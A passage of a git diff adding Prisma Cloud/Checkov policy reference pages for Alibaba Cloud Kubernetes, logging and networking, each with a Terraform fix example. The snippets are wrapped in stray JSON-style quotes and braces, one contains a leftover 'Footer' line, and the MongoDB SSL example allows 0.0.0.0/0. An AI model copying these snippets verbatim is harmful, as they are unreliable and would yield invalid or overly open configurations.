b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/alibaba-kubernetes-policies.adoc new file mode 100644 index 000000000..a697fe74a --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/alibaba-kubernetes-policies.adoc @@ -0,0 +1,19 @@ +== Alibaba Kubernetes Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc[Alibaba Cloud Kubernetes does not install plugin Terway or Flannel to support standard policies] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py[CKV_ALI_26] +|LOW + + +|xref:ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc[Alibaba Cloud Kubernetes node pools are not set to auto repair] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py[CKV_ALI_31] +|LOW + + +|=== + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc new file mode 100644 index 000000000..aa56403b3 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc @@ -0,0 +1,88 @@ +== Alibaba Cloud Kubernetes does not install plugin Terway or Flannel to support standard policies + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b1622f63-3d01-4550-9d35-6946c08f36e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py[CKV_ALI_26] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Terway and Flannel are network plugins that enable seamless connectivity and communication between pods within a Kubernetes cluster. Installing the Terway or Flannel plugins on an Alibaba Cloud Kubernetes cluster can ensure adherence to standard network policies for routing and communication between pods. + +=== Fix - Buildtime + + +*Terraform* + +To install Terway or Flannel plugins on an Alibaba Cloud Kubernetes cluster, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_cs_kubernetes" "pass" { + worker_number = 4 + worker_vswitch_ids = ["vsw-id1", "vsw-id1", "vsw-id3"] + master_vswitch_ids = ["vsw-id1", "vsw-id1", "vsw-id3"] + master_instance_types = ["ecs.n4.small", "ecs.sn1ne.xlarge", "ecs.n4.xlarge"] + worker_instance_types = ["ecs.n4.small", "ecs.sn1ne.xlarge", "ecs.n4.xlarge"] + + addons { + config = "" + name = "terway-eniip" + } + + + pod_vswitch_ids = ["vsw-id4"] +} + + +# array of addons +resource "alicloud_cs_kubernetes" "pass2" { + worker_number = 4 + worker_vswitch_ids = ["vsw-id1", "vsw-id1", "vsw-id3"] + master_vswitch_ids = ["vsw-id1", "vsw-id1", "vsw-id3"] + master_instance_types = ["ecs.n4.small", "ecs.sn1ne.xlarge", "ecs.n4.xlarge"] + worker_instance_types = ["ecs.n4.small", "ecs.sn1ne.xlarge", "ecs.n4.xlarge"] + + addons { + config = "" + name = "flannel" + } + + + addons { + name = "csi-plugin" + config = "" + } + + + pod_cidr = "10.0.1.0/16" +} + +", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc new file mode 100644 index 000000000..cf5d8d3c8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc @@ -0,0 +1,68 @@ +== Alibaba Cloud Kubernetes node pools are not set to auto repair + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7ad299d9-0dcb-41ce-9f66-0a30c5700b13 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py[CKV_ALI_31] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +By enabling auto repair for Alibaba Cloud Kubernetes node pools, you can help ensure that your node pool is highly available and can automatically recover from failures or disruptions. +If a node in the pool fails or becomes unavailable, auto repair can automatically replace the node to restore full functionality to the pool. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_cs_kubernetes_node_pool" "pass" { + name = var.name + cluster_id = alicloud_cs_managed_kubernetes.default.0.id + vswitch_ids = [alicloud_vswitch.default.id] + instance_types = [data.alicloud_instance_types.default.instance_types.0.id] + + system_disk_category = "cloud_efficiency" + system_disk_size = 40 + key_name = alicloud_key_pair.default.key_name + + # comment out node_count and specify a new field desired_size + # node_count = 1 + + desired_size = 1 + + management { + auto_repair = true + auto_upgrade = false #default + surge = 1 + max_unavailable = 1 + } + +}", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-launch-template-data-disks-are-encrypted.adoc b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-launch-template-data-disks-are-encrypted.adoc new file mode 100644 index 000000000..c9a8fe970 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-launch-template-data-disks-are-encrypted.adoc @@ -0,0 +1,114 @@ +== Alibaba Cloud launch template data disks are not encrypted + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5dea0e04-6728-4a04-a8e4-1dbbff5ec28b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py[CKV_ALI_32] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +As a best practice enable encryption for your Alibaba Cloud launch template data disks to improve data security without making changes to your business or applications. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_ecs_launch_template" "pass" { + launch_template_name = "tf_test_name" + description = "Test For Terraform" + image_id = "m-bp1i3ucxxxxx" + host_name = "host_name" + instance_charge_type = "PrePaid" + instance_name = "instance_name" + instance_type = "ecs.instance_type" + internet_charge_type = "PayByBandwidth" + internet_max_bandwidth_in = "5" + internet_max_bandwidth_out = "0" + io_optimized = "optimized" + key_pair_name = "key_pair_name" + ram_role_name = "ram_role_name" + network_type = "vpc" + security_enhancement_strategy = "Active" + spot_price_limit = "5" + spot_strategy = "SpotWithPriceLimit" + security_group_ids = ["sg-zkdfjaxxxxxx"] + system_disk { + category = "cloud_ssd" + description = "Test For Terraform" + name = "tf_test_name" + size = "40" + delete_with_instance = "false" + } + + + resource_group_id = "rg-zkdfjaxxxxxx" + user_data = "xxxxxxx" + vswitch_id = "vw-zwxscaxxxxxx" + vpc_id = "vpc-asdfnbgxxxxxxx" + zone_id = "cn-hangzhou-i" + + template_tags = { + Create = "Terraform" + For = "Test" + } + + + network_interfaces { + name = "eth0" + description = "hello1" + primary_ip = "10.0.0.2" + security_group_id = "sg-asdfnbgxxxxxxx" + vswitch_id = "vw-zkdfjaxxxxxx" + } + + + data_disks { + name = "disk1" + description = "test1" + delete_with_instance = "true" + category = "cloud" + encrypted = true + performance_level = "PL0" + size = "20" + } + + + data_disks { + name = "disk2" + description = "test2" + delete_with_instance = "true" + category = "cloud" + encrypted = true + performance_level = "PL0" + size = "20" + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/alibaba-logging-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/alibaba-logging-policies.adoc new file mode 100644 index 000000000..b61938d66 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/alibaba-logging-policies.adoc @@ -0,0 +1,34 @@ +== Alibaba Logging Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc[Alibaba Cloud Action Trail Logging is not enabled for all events] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py[CKV_ALI_5] +|MEDIUM + + +|xref:ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc[Alibaba Cloud Action Trail Logging is not enabled for all regions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py[CKV_ALI_4] +|MEDIUM + + +|xref:ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc[Alibaba Cloud OSS bucket has access logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py[CKV_ALI_12] +|LOW + + +|xref:ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc[Alibaba Cloud RDS Instance SQL Collector Retention Period is less than 180] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSRetention.py[CKV_ALI_25] +|LOW + + +|xref:ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc[Alibaba Cloud Transparent Data Encryption is disabled on instance] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py[CKV_ALI_22] +|LOW + + +|=== + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc new file mode 100644 index 000000000..f157252c3 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc @@ -0,0 +1,55 @@ +== Alibaba Cloud Action Trail Logging is not enabled for all events + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e0fe6e89-6e05-42c9-b613-54056934ae90 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py[CKV_ALI_5] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Enable ActionTrail log service for all events to track and monitor all activity in your Alibaba Cloud account, including all API calls and account activity. This logging service can help to identify potential security issues or unauthorized access, and can also be useful for auditing purposes. + +=== Fix - Buildtime + +To enable Alibaba Cloud ActionTrail Log Services, add the following code to your Terraform file during buildtime. + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_actiontrail_trail" "pass" { + trail_name = "action-trail" + oss_write_role_arn = "acs:ram::1182725xxxxxxxxxxx" + oss_bucket_name = "bucket_name" + event_rw = "All" + trail_region = "All" +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc new file mode 100644 index 000000000..beb0edaf8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc @@ -0,0 +1,57 @@ +== Alibaba Cloud Action Trail Logging is not enabled for all regions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 86797fca-4af1-46af-aa21-47d63236af2f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py[CKV_ALI_4] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +By enabling Action Trail logging for all regions, you can track and monitor all activity in your Alibaba Cloud account, including the source IP address, the user or service that made the request, and the response status, regardless of where the activity occurs. +This can help to identify potential security issues or unauthorized access, and can also be useful for auditing purposes. + +=== Fix - Buildtime + + +*Terraform* + +To enable Cloud ActionTrail Logging Services for all regions. add the following code to your Terraform file during buildtime. + + + + +[source,go] +---- +{ + "resource "alicloud_actiontrail_trail" "pass" { + trail_name = "action-trail" + oss_write_role_arn = "acs:ram::1182725xxxxxxxxxxx" + oss_bucket_name = "bucket_name" + event_rw = "All" + trail_region = "All" +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc new file mode 100644 index 000000000..c15cbb8ab --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc @@ -0,0 +1,60 @@ +== Alibaba Cloud OSS bucket has access logging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| da426a37-d689-4d72-8362-7596f8576a0f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py[CKV_ALI_12] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Enabling 'Access Logging' for an Alibaba Cloud OSS bucket allows you to record information about each request made to the bucket, including the request type, the source IP address, the object accessed, and the response status. This feature is beneficial for tracking and monitoring access to the bucket, identifying potential security risks or unauthorized access, and enhancing overall security and management of the bucket. In addition, access logging serves as a useful tool for auditing purposes, as it provides a comprehensive record of all requests made to the bucket. + + + +=== Fix - Buildtime + + +*Terraform* +To enable 'Access Logging' for an Alibaba Cloud OSS bucket, add the following code to your Terraform file during buildtime. + + + + +[source,go] +---- +{ + "resource "alicloud_oss_bucket" "pass" { + bucket = "bucket-170309-logging" + + logging { + target_bucket = alicloud_oss_bucket.bucket-target.id + target_prefix = "log/" + } + +} +Footer +", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc new file mode 100644 index 000000000..85a11c06d --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc @@ -0,0 +1,68 @@ +== Alibaba Cloud RDS Instance SQL Collector Retention Period is less than 180 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 466bb5f2-164f-40be-a59d-33c71d435be8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSRetention.py[CKV_ALI_25] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +SQL Collector is a feature of Alibaba Cloud RDS that allows you to collect and analyze SQL performance data for your instance. The SQL Collector Retention Period determines the length of time that SQL performance data is retained in the RDS instance. To maintain a longer history of SQL performance data, which is useful for troubleshooting and performance optimization, set the SQL Collector Retention Period to a value greater than 180 (180 days). + +=== Fix - Buildtime + + +*Terraform* + +To modify the SQL Collector Retention Period, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_db_instance" "pass" { + engine = "MySQL" + engine_version = "5.6" + instance_type = "rds.mysql.t1.small" + instance_storage = "10" + sql_collector_status = "Enabled" + sql_collector_config_value = 180 + parameters = [{ + name = "innodb_large_prefix" + value = "ON" + }, { + + name = "connect_timeout" + value = "50" + }, { + + name = "log_connections" + value = "ON" + }] + +}", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc new file mode 100644 index 000000000..7eb405adb --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc @@ -0,0 +1,64 @@ +== Alibaba Cloud Transparent Data Encryption is disabled on instance + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 68c3dec0-01bc-4231-9a42-19dfbd172dcb + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py[CKV_ALI_22] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Alibaba Cloud Transparent Data Encryption (TDE) is a security feature that encrypts data at the storage level, which means that data is encrypted while it is written to the disk and decrypted when it is read. Activating TDE on an instance helps to protect the data stored on the instance from unauthorized access or exposure. +TDE also helps to meet compliance requirements that mandate data to be encrypted at rest. + +=== Fix - Buildtime + + +*Terraform* + +To enable TDE, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_db_instance" "pass" { + engine = "MySQL" + engine_version = "5.6" + instance_type = "rds.mysql.t1.small" + instance_storage = "10" + tde_status = "Enabled" + parameters = [{ + name = "innodb_large_prefix" + value = "ON" + }, { + + name = "connect_timeout" + value = "50" + }] + +}", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/alibaba-networking-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/alibaba-networking-policies.adoc new file mode 100644 index 000000000..f7a49e2cc --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/alibaba-networking-policies.adoc @@ -0,0 +1,54 @@ +== Alibaba Networking Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc[Alibaba cloud ALB ACL does not restrict public access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py[CKV_ALI_29] +|LOW + + +|xref:ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc[Alibaba Cloud API Gateway API Protocol does not use HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py[CKV_ALI_21] +|LOW + + +|xref:ensure-alibaba-cloud-cypher-policy-is-secured.adoc[Alibaba Cloud Cypher Policy is not secured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py[CKV_ALI_33] +|LOW + + +|xref:ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc[Alibaba Cloud MongoDB instance is public] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py[CKV_ALI_43] +|LOW + + +|xref:ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc[Alibaba Cloud Mongodb instance does not use SSL] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py[CKV_ALI_42] +|LOW + + +|xref:ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc[Alibaba Cloud MongoDB is not deployed inside a VPC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py[CKV_ALI_41] +|LOW + + +|xref:ensure-alibaba-cloud-rds-instance-uses-ssl.adoc[Alibaba Cloud RDS instance does not use SSL] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py[CKV_ALI_20] +|LOW + + +|xref:ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc[Alibaba Cloud Security group allow internet traffic to SSH port (22)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py[CKV_ALI_2] +|HIGH + + +|xref:ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc[Alibaba Cloud Security group allow internet traffic to RDP port (3389)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py[CKV_ALI_3] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc new file mode 100644 index 000000000..dc594a02e --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc @@ -0,0 +1,48 @@ +== Alibaba cloud ALB ACL does not restrict public access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 989dceb7-e144-49cc-bc0f-cbf5f3ddd752 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py[CKV_ALI_29] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Alibaba Cloud ALB ACL refers to Access Control List feature of the Alibaba Cloud Server Load Balancer (SLB) product called Application Load Balancer (ALB). Through ALB ACL, you can prevent public access to your backend servers by configuring various settings such as IP addresses, domain names, HTTP methods, or HTTP header fields. + +=== Fix - Buildtime + +To restrict public access to your servers through ALB ACL, add the following code to your Terraform file during buildtime. + + +[source,go] +---- +{ + "resource "alicloud_alb_acl_entry_attachment" "phew" { + acl_id = alicloud_alb_acl.fail.id + entry = "10.0.0.0/16" + description = var.name +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc new file mode 100644 index 000000000..6675302b0 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc @@ -0,0 +1,92 @@ +== Alibaba Cloud API Gateway API Protocol does not use HTTPS + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a2b6fc74-b931-4679-a6ca-f6ccced850c6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py[CKV_ALI_21] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +To prevent unauthorized access or tampering with data being transferred, use a secure Gateway API protocol such as HTTPS, which encrypts communication between clients and servers. This helps to mitigate the risk of potential security risks such as man-in-the-middle attacks, in which an attacker intercepts and modifies the communication between the API and its clients. + + +=== Fix - Buildtime + + +*Terraform* + +To configure HTTPS as the Alibaba Cloud API Gateway API protocol, add the following code to your Terraform file during buildtime. + + + + +[source,go] +---- +{ + " +resource "alicloud_api_gateway_api" "pass" { + name = alicloud_api_gateway_group.apiGroup.name + group_id = alicloud_api_gateway_group.apiGroup.id + description = "your description" + auth_type = "APP" + force_nonce_check = false + + request_config { + protocol = "HTTPS" + method = "GET" + path = "/test/path1" + mode = "MAPPING" + } + + + service_type = "HTTP" + + http_service_config { + address = "https://apigateway-backend.alicloudapi.com:8080" + method = "GET" + path = "/web/cloudapi" + timeout = 12 + aone_name = "cloudapi-openapi" + } + + + request_parameters { + name = "aaa" + type = "STRING" + required = "OPTIONAL" + in = "QUERY" + in_service = "QUERY" + name_service = "testparams" + } + + + stage_names = [ + "RELEASE", + "TEST", + ] +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-cypher-policy-is-secured.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-cypher-policy-is-secured.adoc new file mode 100644 index 000000000..94a188a80 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-cypher-policy-is-secured.adoc @@ -0,0 +1,50 @@ +== Alibaba Cloud Cypher Policy is not secured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a451b6a9-79fe-49bf-b5cb-2e007d2fa683 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py[CKV_ALI_33] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of TLS protocol (i.e. +TLS 1.2) as part of Alibaba Cloud Cypher policy configuration. + +=== Fix - Buildtime + +To enable support for the TLS v 1.2 protocol in your Alibaba Cloud Cypher policy, add the following code to your Terraform file during buildtime. + + +[source,go] +---- +{ + "resource "alicloud_slb_tls_cipher_policy" "pass" { + tls_cipher_policy_name = "itsfine" + tls_versions = ["TLSv1.2"] + ciphers = ["AES256-SHA","AES256-SHA256", "AES128-GCM-SHA256"] +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc new file mode 100644 index 000000000..e6326c009 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc @@ -0,0 +1,66 @@ +== Alibaba Cloud MongoDB instance is public + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b355c876-4d77-405b-b0f6-0aa38c70fa40 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py[CKV_ALI_43] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description +If an Alibaba Cloud MongoDB instance is configured to be publicly accessible, it can be accessed by anyone on the internet. This could lead to several security risks, including unauthorized access and data theft. To restrict access to your Alibaba Cloud MongoDB instance, disable public network access and allow access only from a private endpoint. + + +// === Fix - Runtime + + +=== Fix - Buildtime + +To restrict public access to an Alibaba Cloud MongoDB instance, add the following code to your Terraform file during buildtime. + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_mongodb_instance" "pass2" { + engine_version = "3.4" + db_instance_class = "dds.mongo.mid" + db_instance_storage = 10 + vswitch_id = alicloud_vswitch.ditch.id + security_ip_list = ["10.168.1.12", "100.69.7.112"] + kms_encryption_context= { + + } + + # tde_status = "Disabled" + ssl_action = "Update" + # not set + network_type = "VPC" +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc new file mode 100644 index 000000000..fa6d29db8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc @@ -0,0 +1,61 @@ +== Alibaba Cloud Mongodb instance does not use SSL + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 775e2cd1-e23e-4ed4-8f39-36a0332471ab + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py[CKV_ALI_42] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +SSL helps protect your data from unauthorized access or tampering by encrypting the data as it is transmitted between the MongoDB instance and the client. +By enabling SSL, you can help ensure that only authorized users with the correct keys can access and decrypt the data, and that the data is protected while in transit. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_mongodb_instance" "pass2" { + engine_version = "3.4" + db_instance_class = "dds.mongo.mid" + db_instance_storage = 10 + vswitch_id = alicloud_vswitch.ditch.id + security_ip_list = ["0.0.0.0/0","10.168.1.12", "100.69.7.112"] + kms_encryption_context= { + + } + + # tde_status = "Disabled" + ssl_action = "Update" + # not set + network_type = "VPC" +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc new file mode 100644 index 000000000..555392371 --- /dev/null +++ 